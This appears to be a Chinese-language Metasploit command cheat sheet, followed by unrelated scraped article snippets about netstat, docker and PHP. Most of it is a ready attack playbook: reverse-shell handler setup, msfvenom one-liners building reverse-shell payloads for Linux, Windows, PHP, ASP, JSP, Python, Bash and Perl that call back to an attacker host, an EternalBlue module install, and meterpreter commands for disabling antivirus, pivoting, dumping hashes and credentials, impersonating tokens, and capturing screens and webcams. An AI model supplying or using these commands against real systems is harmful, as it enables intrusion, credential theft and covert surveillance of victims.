msf下的命令

set session x:设置要攻击的session

#监听端口反弹PHP shell

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST

set LPORT

run

#end

#windows/shell_reverse_tcp模块可创建具有meterpreter功能的各版本shellcode,比如Asp、Aspx、msi、vbs、war

#使用windows/shell_reverse_tcp反弹shell

show payloads

use windows/shell_reverse_tcp

set LHOST

set LPORT

save

generate -h    #查看具体命令

generate -t asp #生成asp的shellcode

#监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST

set LPORT

run

#将shell上传后访问

#end

meterpreter下的命令

ps:获取目标机正在运行的进程

getpid:查看meterpreter shell的进程号

migrate :把meterpreter shell移动到PID为448的进程中

kill :杀掉PID为984的进程

run post/windows/manage/migrate:自动寻找合适的进程迁移

sysinfo:查看目标系统信息

run post/windows/gather/checkvm:检查目标是否运行在虚拟机上

idletime:查看目标机最近的运行时间

route:目标机完整的网络设置

getuid:查看当前用户名

background:将当前会话放到后台(适合在多个meterpreter会话的场景下使用)

run post/windows/manage/killav:关闭目标机系统杀毒软件

run post/windows/manage/enable_rdp:开启目标机3389端口

run post/windows/manage/autoroute:查看目标机的本地子网情况

background->route add xxx xxx(添加路由)->route print(查看路由)

↑[路由添加到已攻陷的主机的路由表中,就可以借助被攻陷的主机对其他网络进行攻击]

run post/windows/gather/enum_logged_on_users:列举当前有多少用户登录了目标机

run post/windows/gather/enum_applications:列举安装在目标机上的应用程序

run windows/gather/credentials/windows_autologin:抓取自动登录的用户名和密码

load espia(加载espia插件)->screengrab(抓取目标机的屏幕截图)

screengrab(也可直接使用screengrab命令抓取目标机的屏幕截图)

webcam_list:查看目标机是否有摄像头

webcam_snap:打开目标机摄像头拍一张照片

webcam_stream:抓取目标机视频

shell:进入目标机shell

exit:停止meterpreter会话

pwd/getwd:查看当前处于目标机哪个目录

getlwd:查看当前处于本地的那个目录

ls:列出当前目录的所有文件

cd:切换目录

search -f *.txt -d c:\:搜索C盘中所有txt文件(-f指定搜索文件模式,-d指定目录)

download c:\test.txt /root:下载目标机c盘的test.txt文件到本机root下

upload /root/test.txt c:\:上传本地root下test.txt文件到目标机c盘下

getsystem:提权

#假冒令牌↓

#有两种类型令牌:

#Delegation Tokens(授权令牌,支持交互式登录,例如远程桌面登录)

#Impersonation Tokens(模拟令牌,非交互式的会话)

在incognito下假冒

use incognito->list_tokens -u:列出可用的token

impersonate_token xxxx\\system:假冒xxxx用户进行攻击(要用两个\)

#end

hashdump:导出目标机的hash

run windows/gather/smart_hashdump:导出域所有用户的hash

移植并利用MS17-010(windows 2003)漏洞利用代码

#MSF中MS17-010不支持windows

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

将Eternalblue-Doublepulsar-Metasploit文件夹下的eternalblue-doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb下

msfconsole->reload_all   #在MSF下重新加载全部文件

search eternalblue-doublepulsar    #现在就可以搜到该脚本了

利用msfvenom生成shell的命令

Linux:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse

_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

MSF常用命令备忘录的更多相关文章

  1. msf常用命令

    msf > search -r great -t exploits search命令查找rank为great的exploit msf > setg RHOST 192.168.1.102 ...

  2. Netstat 常用命令--备忘录

    Netstat 用于显示与IP .TCP .UDP 和ICMP 协议相关的统计数据,一般用于检验本机各端口的网络连接情况. 常用参数 -a (all)显示所有选项,默认不显示LISTEN相关-t (t ...

  3. docker 常用命令备忘录

    基础命令 docker version docker info docker --help   镜像命令 查看 docker images   其中: REPOSITORY:表示镜像的仓库源 TAG: ...

  4. 【MYSQL】常用命令备忘录

    source 不接路径时,查找文件的路径是执行mysql命令时的路径 接路径时,使用路径+filename [root@wordpressserver mysql]# vi demo.mysql [r ...

  5. 【长期更新】Ubuntu常用命令备忘录

    Error  Could not get lock /var/lib/dpkg/lock 出现这个问题可能是有另外一个程序正在运行,导致资源被锁不可用.而导致资源被锁的原因可能是上次运行安装或更新时没 ...

  6. mac 下常用命令备忘录

    1.查看端口号 lsof -i: 2.杀死进程 kill 41321 3.查看文件夹文件 ls ls -l //看到文件及文件夹更多的内容 ls -a //隐藏的文件 ls -la //上面的组合 4 ...

  7. git常用命令备忘录

    返回未修改状态 [git checkout . --没有的提交的,都返回到原来的状态  git clean -xdf 删除文件和目录] git checkout . && git cl ...

  8. linux常用命令大全(linux基础命令入门到精通+命令备忘录+面试复习+实例)

    作者:蓝藻(罗蓝国度) 创建时间:2018.7.3 编辑时间:2019.4.29 前言 本文特点 授之以渔:了解命令学习方法.用途:不再死记硬背,拒绝漫无目的: 准确无误:所有命令执行通过(环境为ce ...

  9. linux常用命令大全(linux基础命令+命令备忘录+面试复习)

    linux常用命令大全(linux基础命令+命令备忘录+面试复习)-----https://www.cnblogs.com/caozy/p/9261224.html

随机推荐

  1. 【翻译】.NET 5 Preview7发布

    今天,发布了.NET 5.0 Preview7.这是倒数第二个预览版本(在转移到RC之前).此时,大多数功能应该已经非常接近完成了.Single file和ARM64 intrinsics是两个花费了 ...

  2. 毫不留情地揭开 ArrayList 和 LinkedList 之间的神秘面纱

    先看再点赞,给自己一点思考的时间,思考过后请毫不犹豫微信搜索[沉默王二],关注这个靠才华苟且的程序员.本文 GitHub github.com/itwanger 已收录,里面还有技术大佬整理的面试题, ...

  3. DeviceEventEmmiter使用

    发送广播一个事件 DeviceEventEmitter.emit('updatePlantList', '创建工厂成功');//通知刷新工厂列表 接收处,添加监听(监听要再事件发生之前添加,否则无法回 ...

  4. SQL语法分类

    数据查询 语法格式 : select [ , ...] from table_reference [ , ...] 去重复值 distinct关键字 , 从select结果集中删除所有重复的行,使结果 ...

  5. 想理解JVM看了这篇文章,就知道了!(一)

    前言 ​ 本章节属于Java进阶系列,前面关于设计模式讲解完了,有兴趣的童鞋可以翻看之前的博文,后面会讲解JVM的优化,整个系列会完整的讲解整个java体系与生态相关的中间件知识.本次将对jvm有更深 ...

  6. shell 格式化数据,转换为execl

    awk '  BEGIN { OFS="\t"} ;{ $1=$1 ; print $8,$NF} ' >/root/log/aa.xlsx awk '  BEGIN { O ...

  7. laravel开发调试工具laravel-debugbar的安装

    一.使用 Composer 安装该扩展包 composer require barryvdh/laravel-debugbar --dev 二.(可选)修改配置文件app/config.php Lar ...

  8. Fortify Audit Workbench 笔记 Password Management: Password in Configuration File(明文存储密码)

    Password Management: Password in Configuration File(明文存储密码) Abstract 在配置文件中存储明文密码,可能会危及系统安全. Explana ...

  9. PHP link() 函数

    定义和用法 link() 函数创建一个从指定名称连接的现存目标文件开始的硬连接. 如果成功,该函数返回 TRUE.如果失败,则返回 FALSE. 语法 link(target,link) 参数 描述 ...

  10. PHP password_hash() 函数

    password_hash() 函数用于创建密码的散列(hash) PHP 版本要求: PHP 5 >= 5.5.0, PHP 7高佣联盟 www.cgewang.com 语法 string p ...